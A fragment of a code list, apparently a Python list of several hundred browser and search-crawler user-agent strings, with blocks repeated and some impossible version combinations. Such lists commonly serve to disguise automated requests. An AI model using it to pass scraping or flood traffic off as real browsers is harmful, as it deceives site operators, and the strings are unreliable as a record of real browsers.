'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
